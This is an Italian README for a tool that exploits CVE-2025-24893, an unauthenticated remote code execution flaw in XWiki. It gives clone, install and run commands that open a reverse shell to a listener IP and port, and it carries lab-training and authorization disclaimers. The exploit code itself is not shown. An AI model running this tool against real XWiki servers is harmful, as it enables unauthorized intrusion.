
Exploit stile OSCP per CVE-2025-24893 per Linux XWiki
XWiki Platform è una piattaforma wiki generica che fornisce servizi runtime per le applicazioni costruite su di essa. A causa di una vulnerabilità nell'endpoint SolrSearch, un utente non autenticato può ottenere l'esecuzione arbitraria di codice remoto. Questa vulnerabilità compromette la riservatezza, l'integrità e la disponibilità dell'intera installazione XWiki.
CVE: CVE-2025-24893
Di seguito è mostrata una dimostrazione dell'exploit:

Per utilizzare questo exploit, segui questi passaggi:
git clone https://github.com/yourusername/CVE-2025-24893.gitcd CVE-2025-24893pip install requests./CVE-2025-24893_linux-xwiki-exploit.py -t http(s)://[target]:(port) -l [Listener IP] -p [Listener PORT] [-hp [Local HTTP PORT]]
Questo exploit dimostra la vulnerabilità di esecuzione remota di codice descritta in CVE-2025-24893 e consente a un utente non autenticato di ottenere una reverse shell su installazioni XWiki Linux vulnerabili.
Ho originariamente sviluppato questo strumento per l'uso in ambienti di formazione come i laboratori di preparazione OSCP e Hack The Box, dove volevo un modo semplice e affidabile per riprodurre la vulnerabilità. Poiché nessuno strumento esistente soddisfaceva i miei requisiti, ho deciso di crearne uno.
Sebbene CVE-2025-24893 sia stata corretta da tempo nelle versioni supportate di XWiki, questo exploit dovrebbe essere utilizzato solo contro sistemi di tua proprietà o per i quali hai esplicitamente ricevuto autorizzazione a testarli.
L'autore non si assume alcuna responsabilità per un uso improprio di questo software o per eventuali danni derivanti dal suo utilizzo.
Questo strumento è destinato esclusivamente a scopi educativi e a valutazioni di sicurezza autorizzate.
Utilizzalo solo contro sistemi di tua proprietà o per i quali hai esplicitamente ricevuto autorizzazione a testarli. L'autore non si assume alcuna responsabilità per un uso improprio di questo software o per eventuali danni derivanti dal suo utilizzo.
I contributi sono benvenuti.
Se incontri bug, hai suggerimenti per miglioramenti o desideri aggiungere supporto per payload, piattaforme o funzionalità aggiuntive, sentiti libero di aprire un issue o inviare una pull request.
Il feedback costruttivo, i report di test e i contributi di codice sono molto apprezzati.